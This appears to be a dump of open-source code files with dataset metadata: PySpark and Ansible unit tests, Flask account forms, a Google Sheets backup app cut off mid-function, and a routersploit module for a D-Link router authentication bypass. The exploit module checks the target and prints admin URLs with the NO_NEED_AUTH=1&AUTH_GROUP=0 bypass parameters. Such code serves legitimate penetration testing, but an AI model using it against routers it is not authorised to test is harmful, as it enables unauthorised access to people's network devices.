        pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
        pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.where(psdf2 < -250)

    def test_mask(self):
        """``mask`` with a condition from another anchor is rejected."""
        pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.mask(psdf2 < 100)
        pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
        pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.mask(psdf2 > -250)

    def test_align(self):
        """``align`` across anchors is rejected."""
        pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
        pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.align(psdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.align(psdf2, axis=0)

    def test_pow_and_rpow(self):
        """``pow``/``**``/``rpow`` across anchors are rejected."""
        pser = pd.Series([1, 2, np.nan])
        psser = ps.from_pandas(pser)
        pser_other = pd.Series([np.nan, 2, 3])
        psser_other = ps.from_pandas(pser_other)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.pow(psser_other)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser ** psser_other
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.rpow(psser_other)

    def test_combine_first(self):
        """``combine_first`` across anchors (and with a wrong-typed argument) is rejected."""
        pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
        psdf1 = ps.from_pandas(pdf1)
        # Frame combined with a Series is a TypeError regardless of anchors.
        self.assertRaises(TypeError, lambda: psdf1.combine_first(ps.Series([1, 2])))
        pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
        pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser1.combine_first(psser2)
        pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
        psdf1 = ps.from_pandas(pdf1)
        pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.combine_first(psdf2)
if __name__ == "__main__":
    # Re-export the test classes so unittest discovers them under this module name.
    from pyspark.pandas.tests.test_ops_on_diff_frames import *  # noqa: F401

    try:
        import xmlrunner  # type: ignore[import]

        # Emit JUnit-style XML reports when xmlrunner is available (CI).
        testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
    except ImportError:
        # Fall back to the default text runner locally.
        testRunner = None
    unittest.main(testRunner=testRunner, verbosity=2)
| true | true |
f7fa3ea0d3d0549f395e122654ded5814882e7f6 | 4,658 | py | Python | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/packaging/language/test_gem.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/packaging/language/test_gem.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/packaging/language/test_gem.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | # Copyright (c) 2018 Antoine Catton
# MIT License (see licenses/MIT-license.txt or https://opensource.org/licenses/MIT)
import copy
import pytest
from ansible_collections.community.general.plugins.modules.packaging.language import gem
from ansible_collections.community.general.tests.unit.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
def get_command(run_command):
    """Return the argv of the latest patched ``run_command`` call as one string."""
    # call_args[0] is the positional-argument tuple; its first element is the
    # argv list handed to run_command.
    positional = run_command.call_args[0]
    argv = positional[0]
    return ' '.join(argv)
class TestGem(ModuleTestCase):
    """Unit tests for the ``gem`` module's command-line construction."""

    def setUp(self):
        """Patch gem.get_rubygems_path so the module sees a fixed gem binary."""
        super(TestGem, self).setUp()
        self.rubygems_path = ['/usr/bin/gem']
        self.mocker.patch(
            'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_path',
            # deepcopy so a test mutating the returned list cannot leak state.
            lambda module: copy.deepcopy(self.rubygems_path),
        )

    @pytest.fixture(autouse=True)
    def _mocker(self, mocker):
        # Bridge the pytest-mock fixture onto this unittest-style class.
        self.mocker = mocker

    def patch_installed_versions(self, versions):
        """Mocks the versions of the installed package"""
        target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_installed_versions'

        def new(module, remote=False):
            return versions

        return self.mocker.patch(target, new)

    def patch_rubygems_version(self, version=None):
        """Mock gem.get_rubygems_version to report the given version."""
        target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_version'

        def new(module):
            return version

        return self.mocker.patch(target, new)

    def patch_run_command(self):
        """Patch AnsibleModule.run_command; returns the mock for call inspection."""
        target = 'ansible.module_utils.basic.AnsibleModule.run_command'
        return self.mocker.patch(target)

    def test_fails_when_user_install_and_install_dir_are_combined(self):
        """install_dir is only valid together with user_install=false."""
        set_module_args({
            'name': 'dummy',
            'user_install': True,
            'install_dir': '/opt/dummy',
        })

        with pytest.raises(AnsibleFailJson) as exc:
            gem.main()

        result = exc.value.args[0]
        assert result['failed']
        assert result['msg'] == "install_dir requires user_install=false"

    def test_passes_install_dir_to_gem(self):
        # XXX: This test is extremely fragile, and makes assuptions about the module code, and how
        #      functions are run.
        #      If you start modifying the code of the module, you might need to modify what this
        #      test mocks. The only thing that matters is the assertion that this 'gem install' is
        #      invoked with '--install-dir'.
        set_module_args({
            'name': 'dummy',
            'user_install': False,
            'install_dir': '/opt/dummy',
        })

        self.patch_rubygems_version()
        self.patch_installed_versions([])
        run_command = self.patch_run_command()

        with pytest.raises(AnsibleExitJson) as exc:
            gem.main()

        result = exc.value.args[0]
        assert result['changed']
        assert run_command.called

        assert '--install-dir /opt/dummy' in get_command(run_command)

    def test_passes_install_dir_and_gem_home_when_uninstall_gem(self):
        # XXX: This test is also extremely fragile because of mocking.
        #      If this breaks, the only that matters is to check whether '--install-dir' is
        #      in the run command, and that GEM_HOME is passed to the command.
        set_module_args({
            'name': 'dummy',
            'user_install': False,
            'install_dir': '/opt/dummy',
            'state': 'absent',
        })

        self.patch_rubygems_version()
        self.patch_installed_versions(['1.0.0'])

        run_command = self.patch_run_command()

        with pytest.raises(AnsibleExitJson) as exc:
            gem.main()

        result = exc.value.args[0]

        assert result['changed']
        assert run_command.called

        assert '--install-dir /opt/dummy' in get_command(run_command)

        # Uninstall must also point GEM_HOME at the custom install dir.
        update_environ = run_command.call_args[1].get('environ_update', {})
        assert update_environ.get('GEM_HOME') == '/opt/dummy'

    def test_passes_add_force_option(self):
        """state-changing install with force=true must add --force to the gem call."""
        set_module_args({
            'name': 'dummy',
            'force': True,
        })

        self.patch_rubygems_version()
        self.patch_installed_versions([])
        run_command = self.patch_run_command()

        with pytest.raises(AnsibleExitJson) as exc:
            gem.main()

        result = exc.value.args[0]
        assert result['changed']
        assert run_command.called

        assert '--force' in get_command(run_command)
| 33.271429 | 140 | 0.647059 |
import copy
import pytest
from ansible_collections.community.general.plugins.modules.packaging.language import gem
from ansible_collections.community.general.tests.unit.modules.utils import AnsibleExitJson, AnsibleFailJson, ModuleTestCase, set_module_args
def get_command(run_command):
    """Return the last command passed to the run_command mock, joined into one string."""
    positional = run_command.call_args[0]
    return ' '.join(positional[0])
class TestGem(ModuleTestCase):
def setUp(self):
super(TestGem, self).setUp()
self.rubygems_path = ['/usr/bin/gem']
self.mocker.patch(
'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_path',
lambda module: copy.deepcopy(self.rubygems_path),
)
@pytest.fixture(autouse=True)
def _mocker(self, mocker):
self.mocker = mocker
def patch_installed_versions(self, versions):
target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_installed_versions'
def new(module, remote=False):
return versions
return self.mocker.patch(target, new)
def patch_rubygems_version(self, version=None):
target = 'ansible_collections.community.general.plugins.modules.packaging.language.gem.get_rubygems_version'
def new(module):
return version
return self.mocker.patch(target, new)
def patch_run_command(self):
target = 'ansible.module_utils.basic.AnsibleModule.run_command'
return self.mocker.patch(target)
def test_fails_when_user_install_and_install_dir_are_combined(self):
set_module_args({
'name': 'dummy',
'user_install': True,
'install_dir': '/opt/dummy',
})
with pytest.raises(AnsibleFailJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['failed']
assert result['msg'] == "install_dir requires user_install=false"
def test_passes_install_dir_to_gem(self):
set_module_args({
'name': 'dummy',
'user_install': False,
'install_dir': '/opt/dummy',
})
self.patch_rubygems_version()
self.patch_installed_versions([])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--install-dir /opt/dummy' in get_command(run_command)
def test_passes_install_dir_and_gem_home_when_uninstall_gem(self):
set_module_args({
'name': 'dummy',
'user_install': False,
'install_dir': '/opt/dummy',
'state': 'absent',
})
self.patch_rubygems_version()
self.patch_installed_versions(['1.0.0'])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--install-dir /opt/dummy' in get_command(run_command)
update_environ = run_command.call_args[1].get('environ_update', {})
assert update_environ.get('GEM_HOME') == '/opt/dummy'
def test_passes_add_force_option(self):
set_module_args({
'name': 'dummy',
'force': True,
})
self.patch_rubygems_version()
self.patch_installed_versions([])
run_command = self.patch_run_command()
with pytest.raises(AnsibleExitJson) as exc:
gem.main()
result = exc.value.args[0]
assert result['changed']
assert run_command.called
assert '--force' in get_command(run_command)
| true | true |
f7fa3f1a45b3381ac2f4e41174846e979ed5f25d | 5,001 | py | Python | app/account/forms.py | hack4impact/women-veterans-rock | 7de5f5645819dbe67ba71a1f0b29f84a45e35789 | [
"MIT"
] | 16 | 2015-10-26T20:30:35.000Z | 2017-02-01T01:45:35.000Z | app/account/forms.py | hack4impact/women-veterans-rock | 7de5f5645819dbe67ba71a1f0b29f84a45e35789 | [
"MIT"
] | 34 | 2015-10-21T02:58:42.000Z | 2017-02-24T06:57:07.000Z | app/account/forms.py | hack4impact/women-veterans-rock | 7de5f5645819dbe67ba71a1f0b29f84a45e35789 | [
"MIT"
] | 1 | 2015-10-23T21:32:28.000Z | 2015-10-23T21:32:28.000Z | from flask import url_for
from flask.ext.wtf import Form
from wtforms.fields import (
StringField,
PasswordField,
BooleanField,
SubmitField,
TextAreaField,
DateField,
SelectMultipleField
)
from wtforms.fields.html5 import EmailField
from wtforms.validators import (
Length,
Email,
EqualTo,
URL,
InputRequired,
Optional,
)
from wtforms import ValidationError
from ..models import User, AffiliationTag
class LoginForm(Form):
    """Credentials form for signing in an existing user."""
    email = EmailField(
        'Email',
        validators=[InputRequired(), Length(1, 64), Email()],
    )
    password = PasswordField('Password', validators=[InputRequired()])
    remember_me = BooleanField('Keep me logged in')
    submit = SubmitField('Log in')
class RegistrationForm(Form):
    """Sign-up form for a new user account."""
    first_name = StringField('First name', validators=[
        InputRequired(),
        Length(1, 64)
    ])
    last_name = StringField('Last name', validators=[
        InputRequired(),
        Length(1, 64)
    ])
    email = EmailField('Email', validators=[
        InputRequired(),
        Length(1, 64),
        Email()
    ])
    # 'password' must match the confirmation field 'password2'.
    password = PasswordField('Password', validators=[
        InputRequired(),
        EqualTo('password2', 'Passwords must match')
    ])
    password2 = PasswordField('Confirm password', validators=[InputRequired()])
    # Exactly five characters (US-style ZIP code).
    zip_code = StringField('ZIP Code', validators=[
        InputRequired(),
        Length(5, 5)
    ])
    submit = SubmitField('Register')
    def validate_email(self, field):
        # Inline wtforms validator (validate_<fieldname> is invoked
        # automatically): reject addresses that already have an account.
        # The message embeds an HTML link to the login page.
        if User.query.filter_by(email=field.data).first():
            raise ValidationError('Email already registered. (Did you mean to '
                                  '<a href="{}">log in</a> instead?)'
                                  .format(url_for('account.login')))
class RequestResetPasswordForm(Form):
    """Form for requesting a password-reset email."""
    email = EmailField('Email', validators=[
        InputRequired(),
        Length(1, 64),
        Email()])
    submit = SubmitField('Reset password')
    # We don't validate the email address so we don't confirm to attackers
    # that an account with the given email exists.
class ResetPasswordForm(Form):
    """Form for setting a new password from a reset link."""
    email = EmailField('Email', validators=[
        InputRequired(),
        Length(1, 64),
        Email()])
    new_password = PasswordField('New password', validators=[
        InputRequired(),
        EqualTo('new_password2', 'Passwords must match.')
    ])
    new_password2 = PasswordField('Confirm new password',
                                  validators=[InputRequired()])
    submit = SubmitField('Reset password')
    def validate_email(self, field):
        # Unlike RequestResetPasswordForm, here the user already holds a
        # reset token, so revealing whether the address exists is acceptable.
        if User.query.filter_by(email=field.data).first() is None:
            raise ValidationError('Unknown email address.')
class CreatePasswordForm(Form):
    """Form for choosing a password on an account that has none yet."""
    password = PasswordField(
        'Password',
        validators=[InputRequired(), EqualTo('password2', 'Passwords must match.')],
    )
    password2 = PasswordField(
        'Confirm new password', validators=[InputRequired()]
    )
    submit = SubmitField('Set password')
class ChangePasswordForm(Form):
    """Form for changing the password of a logged-in user.

    Requires the current password as confirmation of identity.
    """
    old_password = PasswordField('Old password', validators=[InputRequired()])
    new_password = PasswordField('New password', validators=[
        InputRequired(),
        EqualTo('new_password2', 'Passwords must match.')
    ])
    new_password2 = PasswordField('Confirm new password',
                                  validators=[InputRequired()])
    submit = SubmitField('Update password')
class ChangeEmailForm(Form):
    """Form for changing the account email; requires password confirmation."""
    email = EmailField('New email', validators=[
        InputRequired(),
        Length(1, 64),
        Email()])
    password = PasswordField('Password', validators=[InputRequired()])
    submit = SubmitField('Update email')
    def validate_email(self, field):
        # Reject the change if another account already uses this address.
        if User.query.filter_by(email=field.data).first():
            raise ValidationError('Email already registered.')
class EditProfileForm(Form):
    """Profile-editing form.

    The ``affiliations`` choices are loaded from the database on every
    instantiation so newly added ``AffiliationTag`` rows appear without an
    application restart.
    """
    first_name = StringField('First name', validators=[
        InputRequired(),
        Length(1, 64)
    ])
    last_name = StringField('Last name', validators=[
        InputRequired(),
        Length(1, 64)
    ])
    bio = TextAreaField('About Me')
    birthday = DateField(
        label='Birthday',
        description="YYYY-MM-DD",
        format="%Y-%m-%d", validators=[Optional()])
    facebook_link = StringField(
        'Facebook Profile',
        description="https://",
        validators=[URL(), Optional()]
    )
    linkedin_link = StringField(
        'LinkedIn Profile',
        description="https://",
        validators=[URL(), Optional()]
    )
    affiliations = SelectMultipleField(
        'Affiliations',
        default=[]
    )
    submit = SubmitField('Update profile')
    def __init__(self, *args, **kwargs):
        # Forward keyword arguments too: the previous signature (*args only)
        # silently rejected the standard wtforms construction patterns such
        # as EditProfileForm(obj=user) or EditProfileForm(formdata=...).
        super(EditProfileForm, self).__init__(*args, **kwargs)
        # Choices must be computed per instance, at request time.
        self.affiliations.choices = [
            (str(affiliation.id), str(affiliation.name))
            for affiliation in AffiliationTag.query.all()
        ]
| 29.946108 | 79 | 0.618276 | from flask import url_for
from flask.ext.wtf import Form
from wtforms.fields import (
StringField,
PasswordField,
BooleanField,
SubmitField,
TextAreaField,
DateField,
SelectMultipleField
)
from wtforms.fields.html5 import EmailField
from wtforms.validators import (
Length,
Email,
EqualTo,
URL,
InputRequired,
Optional,
)
from wtforms import ValidationError
from ..models import User, AffiliationTag
class LoginForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()
])
password = PasswordField('Password', validators=[InputRequired()])
remember_me = BooleanField('Keep me logged in')
submit = SubmitField('Log in')
class RegistrationForm(Form):
first_name = StringField('First name', validators=[
InputRequired(),
Length(1, 64)
])
last_name = StringField('Last name', validators=[
InputRequired(),
Length(1, 64)
])
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()
])
password = PasswordField('Password', validators=[
InputRequired(),
EqualTo('password2', 'Passwords must match')
])
password2 = PasswordField('Confirm password', validators=[InputRequired()])
zip_code = StringField('ZIP Code', validators=[
InputRequired(),
Length(5, 5)
])
submit = SubmitField('Register')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered. (Did you mean to '
'<a href="{}">log in</a> instead?)'
.format(url_for('account.login')))
class RequestResetPasswordForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()])
submit = SubmitField('Reset password')
class ResetPasswordForm(Form):
email = EmailField('Email', validators=[
InputRequired(),
Length(1, 64),
Email()])
new_password = PasswordField('New password', validators=[
InputRequired(),
EqualTo('new_password2', 'Passwords must match.')
])
new_password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Reset password')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise ValidationError('Unknown email address.')
class CreatePasswordForm(Form):
password = PasswordField('Password', validators=[
InputRequired(),
EqualTo('password2', 'Passwords must match.')
])
password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Set password')
class ChangePasswordForm(Form):
old_password = PasswordField('Old password', validators=[InputRequired()])
new_password = PasswordField('New password', validators=[
InputRequired(),
EqualTo('new_password2', 'Passwords must match.')
])
new_password2 = PasswordField('Confirm new password',
validators=[InputRequired()])
submit = SubmitField('Update password')
class ChangeEmailForm(Form):
email = EmailField('New email', validators=[
InputRequired(),
Length(1, 64),
Email()])
password = PasswordField('Password', validators=[InputRequired()])
submit = SubmitField('Update email')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered.')
class EditProfileForm(Form):
first_name = StringField('First name', validators=[
InputRequired(),
Length(1, 64)
])
last_name = StringField('Last name', validators=[
InputRequired(),
Length(1, 64)
])
bio = TextAreaField('About Me')
birthday = DateField(
label='Birthday',
description="YYYY-MM-DD",
format="%Y-%m-%d", validators=[Optional()])
facebook_link = StringField(
'Facebook Profile',
description="https://",
validators=[URL(), Optional()]
)
linkedin_link = StringField(
'LinkedIn Profile',
description="https://",
validators=[URL(), Optional()]
)
affiliations = SelectMultipleField(
'Affiliations',
default=[]
)
submit = SubmitField('Update profile')
def __init__(self, *args):
super(EditProfileForm, self).__init__(*args)
self.affiliations.choices = (
[(str(affiliation.id), str(affiliation.name))
for affiliation in AffiliationTag.query.all()]
)
| true | true |
f7fa3f64974fb0bb7564275775f996229970cfe7 | 2,723 | py | Python | Router/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 46 | 2017-05-15T11:15:08.000Z | 2018-07-02T03:32:52.000Z | Router/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | null | null | null | Router/routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 24 | 2017-05-17T03:26:17.000Z | 2018-07-09T07:00:50.000Z | from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
    """
    Exploit implementation for the D-Link DIR-300, DIR-320, DIR-615
    authentication bypass vulnerability.

    If the target is vulnerable, links that bypass authentication are printed.
    """
    __info__ = {
        'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
        'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
        'authors': [
            'Craig Heffner',  # vulnerability discovery
            'Karol Celin',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
        ],
        'targets': [
            'D-Link DIR-300',
            'D-Link DIR-600',
            'D-Link DIR-615 revD',
        ]
    }
    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port
    def run(self):
        # Runs the check and, on success, prints example URLs that carry the
        # NO_NEED_AUTH=1&AUTH_GROUP=0 query string which skips authentication.
        # NOTE: Python 2 print statements - this module targets Python 2.
        if self.check():
            print_success("Target is vulnerable")
            print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action."
            print "\nExamples:"
            print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
            print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port)
        else:
            print_error("Target seems to be not vulnerable")
    @mute
    def check(self):
        # check if it is a valid target: an unauthenticated request to
        # bsc_lan.php should be redirected to the login form
        url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
        response = http_request(method="GET", url=url)
        if response is None:
            return False  # target is not vulnerable
        if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
            return False  # target is not vulnerable
        # check whether authentication can be bypassed: with the magic query
        # string the login form should no longer be returned
        url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
        response = http_request(method="GET", url=url)
        if response is None:
            return False  # target is not vulnerable
        if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
            return True  # target is vulnerable
        return False  # target is not vulnerable
| 38.9 | 201 | 0.618068 | from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability.
If the target is vulnerable link to bypass authentication will be provided"
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'targets': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action."
print "\nExamples:"
print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return False # target is not vulnerable
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if '<form name="frm" id="frm" method="post" action="login.php">' not in response.text:
return True # target is vulnerable
return False # target is not vulnerable
| false | true |
f7fa4004f6aaa9bd35ddd4d2a4a715e9cff1dad4 | 2,128 | py | Python | app.py | hackedu/sheets-backup | b9db1e1fecab8555baddd0e0505af25e99b13179 | [
"MIT"
] | 3 | 2017-03-08T15:24:04.000Z | 2021-09-26T14:00:10.000Z | app.py | hackclub/sheets-backup | b9db1e1fecab8555baddd0e0505af25e99b13179 | [
"MIT"
] | 1 | 2015-11-25T00:50:07.000Z | 2015-11-25T00:50:07.000Z | app.py | hackedu/sheets-backup | b9db1e1fecab8555baddd0e0505af25e99b13179 | [
"MIT"
] | null | null | null | import os
import sys
import requests
import re
from contextlib import contextmanager
from flask import Flask, request
from sh import cd, git, soffice
GIT_REMOTE = os.environ['GIT_REMOTE']
app = Flask(__name__)
repo = None
def init():
    """Ensure ./repo is a git clone of GIT_REMOTE, cloning it when absent.

    Exits the process with status 1 if a non-git 'repo' directory is in
    the way.
    """
    if not os.path.exists('repo'):
        git.clone(GIT_REMOTE, 'repo')
        return
    if not os.path.isdir('repo/.git'):
        sys.stderr.write('repo/ exists, but is not a git repo')
        sys.exit(1)
# Adapted from http://stackoverflow.com/a/24176022/263998
@contextmanager
def cd(newdir):
    """Context manager: chdir into *newdir* (with ~ expansion) and restore
    the previous working directory on exit, even if the body raises."""
    original_dir = os.getcwd()
    os.chdir(os.path.expanduser(newdir))
    try:
        yield
    finally:
        os.chdir(original_dir)
def export_as_ods(access_token, spreadsheet_id):
    """Download the Google spreadsheet as ODS bytes via the export endpoint,
    authenticating with the given OAuth bearer token."""
    export_url = (
        'https://docs.google.com/feeds/download/spreadsheets/Export?key='
        + spreadsheet_id
        + '&exportFormat=ods'
    )
    auth_headers = {'Authorization': 'Bearer ' + access_token}
    response = requests.get(export_url, headers=auth_headers)
    return response.content
def convert_ods_to_fods(ods_path):
    """Convert an .ods file to flat .fods with headless LibreOffice.

    Writes the converted file next to the input (soffice --outdir) and
    returns the expected destination path.
    """
    ods_filename = os.path.basename(ods_path)
    # Escape the dot: the previous pattern '.ods$' treated '.' as "any
    # character", so e.g. 'foods' would have been rewritten to 'f.fods'.
    dest_filename = re.sub(r'\.ods$', '.fods', ods_filename)
    dest_dir = os.path.dirname(ods_path) or '.'
    soffice('--headless',
            '--convert-to', 'fods',
            '--outdir', dest_dir,
            ods_path)
    return os.path.join(dest_dir, dest_filename)
def write_bytes_to_file(filename, bytes):
    """Write *bytes* to *filename* in binary mode and return the filename.

    Uses a context manager so the file handle is closed even when the
    write raises (the previous version leaked the handle on error).
    """
    with open(filename, 'wb') as out_file:
        out_file.write(bytes)
    return filename
@app.route('/initiate_backup', methods=['POST'])
def backup():
    """Export the given spreadsheet as flat-ODS and commit it to the repo.

    Expects POST form fields 'access_token' (Google OAuth bearer token) and
    'spreadsheet_id'. Pulls the repo, exports/converts the sheet, and pushes
    a commit only when the converted file actually changed.
    """
    access_token = request.form['access_token']
    spreadsheet_id = request.form['spreadsheet_id']
    with cd('repo/'):
        git.pull()
        ods = export_as_ods(access_token, spreadsheet_id)
        # Intermediate .ods is only needed as soffice input; removed below.
        ods_path = write_bytes_to_file('clubs.ods', ods)
        fods_path = convert_ods_to_fods(ods_path)
        os.remove(ods_path)
        # Only commit and push if any files have changed
        # ('git ls-files -m' lists modified tracked files).
        if git('ls-files', '-m'):
            git.add(fods_path)
            git.commit('-m', 'Update spreadsheet.')
            git.push()
    return 'Consider it done!'
# Clone/verify the backup repo at import time so the app can serve requests
# immediately (also runs under WSGI servers, not just `python app.py`).
init()
if __name__ == '__main__':
    app.run(debug=True)
| 25.95122 | 114 | 0.640977 | import os
import sys
import requests
import re
from contextlib import contextmanager
from flask import Flask, request
from sh import cd, git, soffice
GIT_REMOTE = os.environ['GIT_REMOTE']
app = Flask(__name__)
repo = None
def init():
if os.path.exists('repo'):
if not os.path.isdir('repo/.git'):
sys.stderr.write('repo/ exists, but is not a git repo')
sys.exit(1)
else:
git.clone(GIT_REMOTE, 'repo')
@contextmanager
def cd(newdir):
prevdir = os.getcwd()
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
os.chdir(prevdir)
def export_as_ods(access_token, spreadsheet_id):
url = 'https://docs.google.com/feeds/download/spreadsheets/Export?key=' + spreadsheet_id + '&exportFormat=ods'
headers = {
'Authorization': 'Bearer ' + access_token
}
return requests.get(url, headers=headers).content
def convert_ods_to_fods(ods_path):
ods_filename = os.path.basename(ods_path)
dest_filename = re.sub('.ods$', '.fods', ods_filename)
dest_dir = os.path.dirname(ods_path) or '.'
soffice('--headless',
'--convert-to', 'fods',
'--outdir', dest_dir,
ods_path)
return os.path.join(dest_dir, dest_filename)
def write_bytes_to_file(filename, bytes):
f = open(filename, 'wb')
f.write(bytes)
f.close()
return filename
@app.route('/initiate_backup', methods=['POST'])
def backup():
access_token = request.form['access_token']
spreadsheet_id = request.form['spreadsheet_id']
with cd('repo/'):
git.pull()
ods = export_as_ods(access_token, spreadsheet_id)
ods_path = write_bytes_to_file('clubs.ods', ods)
